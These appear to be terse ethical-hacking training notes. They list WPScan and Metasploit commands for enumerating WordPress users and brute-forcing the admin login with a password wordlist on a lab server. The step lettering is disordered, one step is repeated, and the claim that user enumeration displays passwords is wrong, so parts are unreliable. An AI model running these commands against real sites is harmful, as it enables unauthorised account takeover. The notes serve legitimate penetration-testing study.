WPScan - (wp-json/wp/v2/users)
From Kali box
A. In terminal type wpscan --url http://[IP Address of Windows Server 2012]:8080/CEH --enumerate u and press Enter.
B. WPScan will display any passwords available
C. Using msfconsole
D. Type msfconsole
E. type use auxiliary/scanner/http/wordpress_login_enum and press Enter.
- Type set PASS_FILE /root/Desktop/Wordlists/Passwords.txt and press Enter to set file containing the passwords.
- Type set RHOSTS [IP Address of Target] and press Enter to set the target IP Address.
- Type set RPORT 8080 and press Enter to set the target port.
- Type set TARGETURI http://[IP Address of Windows Server 2012]:8080/CEH/ and press Enter to set the base path to the WordPress website.
- Type set USERNAME admin and press Enter to set the username as admin. (Admin is an example you can use any username already found)
K. Type run and press Enter
L. Scroll through results to see if successful
NB: Khanna lab details attack against vunerable plugins
A. In terminal type wpscan --url http://[IP Address of Windows Server 2012]:8080/CEH --enumerate u and press Enter.
B. Scan takes 5-10 mins - Firewall ip could be discovered \ changed